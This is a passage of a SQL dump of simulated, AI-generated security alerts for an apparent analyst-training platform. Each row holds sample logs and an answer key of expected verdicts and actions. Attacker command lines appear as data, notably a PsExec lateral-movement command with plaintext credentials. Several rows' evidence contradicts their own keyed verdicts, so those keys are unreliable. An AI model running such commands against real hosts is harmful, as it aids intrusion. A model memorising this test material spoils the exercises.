4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(681, 'Phishing Email Detected with Clean URL', 'medium', 'Email Gateway', 'A phishing email was detected; however, the URL was verified as clean after further analysis.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T09:40:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.5.10\",\"username\":\"mjohnson\",\"hostname\":\"mail-server\",\"email_sender\":\"info@securemail.com\",\"url\":\"http://legitimate-site.com\"}', '2026-01-10 17:07:54', '2026-03-09 23:40:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@securemail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address associated with previous phishing attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://legitimate-site.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was initially flagged due to the sender\'s history, but the URL was found to be legitimate.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Clean URL\",\"date\":\"2026-02-01T20:32:22.331Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(682, 'DNS Query to Benign Domain Mistaken for DGA', 'low', 'Firewall', 'A DNS query was flagged for potential DGA activity, but the domain was verified as part of legitimate testing activity.', 'Malware', 'T1568', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.40.5\",\"dst_ip\":\"192.168.40.5\",\"username\":\"qauser\",\"hostname\":\"test-machine\",\"domain\":\"test-domain-1234.com\"}', '2026-01-11 07:40:24', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"test-domain-1234.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Domain used for internal testing purposes\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.40.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP address of a test machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain was mistaken for a DGA domain but is used for legitimate testing.\"}', 'Expert', 'MAL', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(683, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike Beacon associated with LockBit 3.0 ransomware was detected communicating with a known malicious IP. Indicators show initial access was achieved via compromised RDP credentials.', 'Malware', 'T1071', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"file_hash\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\"}', '2026-01-10 04:57:56', '2026-02-16 18:05:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities associated with ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a Cobalt Strike payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Cobalt Strike beacon activity detected from internal server communicating with known ransomware-associated IP.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(684, 'Suspicious Email Detected - Potential Phishing', 'high', 'Proofpoint', 'An email purporting to be from a trusted source contained a link to a known phishing domain. The email was flagged due to domain spoofing and suspicious attachments.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"username\":\"asanchez\",\"hostname\":\"USER-LAPTOP02\",\"email_sender\":\"no-reply@trustedsource.com\",\"url\":\"http://phishing-link.example.com\"}', '2026-01-10 12:47:27', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain does not match known trusted sources\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain targeting financial credentials\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for sending phishing emails\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Email contained a link to a known phishing domain and originated from a suspicious IP.\"}', 'Expert', 'NDR', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected - Potential Phishing\",\"date\":\"2026-02-01T20:32:22.333Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(685, 'False Positive: Unusual Network Scanning Activity', 'medium', 'Wazuh', 'A network scanning tool was detected running on an internal server. Analysis revealed it was part of a scheduled vulnerability assessment.', 'Network Activity', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:15:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SCAN01\",\"command_line\":\"nmap -sV 10.0.0.50\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 12:38:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"nmap -sV 10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution aligns with scheduled vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of authorized scanner\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of scanned server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The activity corresponds to an authorized vulnerability scan and is not malicious.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(686, 'BlackCat/ALPHV Ransomware Pre-Encryption Reconnaissance Detected', 'critical', 'Splunk', 'Pre-encryption reconnaissance activities linked to the BlackCat/ALPHV ransomware group were detected. Attackers used PsExec for lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:05:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.45\",\"username\":\"administrator\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\"}', '2026-01-10 02:32:48', '2026-02-16 18:05:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec usage consistent with lateral movement by ransomware groups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec detected being used for lateral movement indicative of ransomware pre-encryption reconnaissance.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(687, 'Brute Force Attack Detected on RDP Service', 'high', 'Wazuh', 'Multiple failed login attempts detected from an external IP address targeting the RDP service on the network. The source IP is associated with known malicious activity.', 'Credential Attack', 'T1110', 1, 'Closed', 137, '{\"timestamp\":\"2026-01-11T08:15:24Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.92.26.102\",\"dst_ip\":\"192.168.1.10\",\"username\":\"administrator\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-11 02:30:22', '2026-02-13 00:04:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has a high number of reports related to brute force activity, confirming this is a legitimate attack.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:31:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:30:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:29:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-02-01T20:28:22.336Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:15:24Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.26.102\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"corp-server-01\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(688, 'Malware Detected - LockBit 3.0 Ransomware', 'critical', 'CrowdStrike', 'A known ransomware file associated with LockBit 3.0 was executed on a corporate workstation. The file hash matches a known malicious signature.', 'Malware', 'T1486', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T10:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"hostname\":\"workstation-05\",\"command_line\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"file_hash\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\"}', '2026-01-10 08:45:54', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2d2c3e2345fabc1234567890defabc1234567890abcd1234567890efab1234c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 55 antivirus engines as LockBit 3.0 ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\User\\\\Downloads\\\\ransom.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware deployment\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is confirmed malicious with a high detection rate on VirusTotal, indicating a true positive ransomware attack.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(689, 'Phishing Email Containing Malicious URL', 'medium', 'Proofpoint', 'A phishing email purporting to be from a legitimate service was received by a user. The email contains a URL leading to a fake login page.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:22:10Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@secure-login.com\",\"username\":\"jdoe\",\"hostname\":\"mailserver-01\",\"url\":\"http://malicious-login.com/login\"}', '2026-01-09 23:23:58', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@secure-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email sender domain detected in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL leads to a phishing page attempting to steal credentials\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_url\",\"warn_user\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The URL in the email is confirmed malicious and is a known phishing site attempting to harvest credentials.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Containing Malicious URL\",\"date\":\"2026-02-01T20:32:22.337Z\",\"x-mailer\":\"PHPMailer 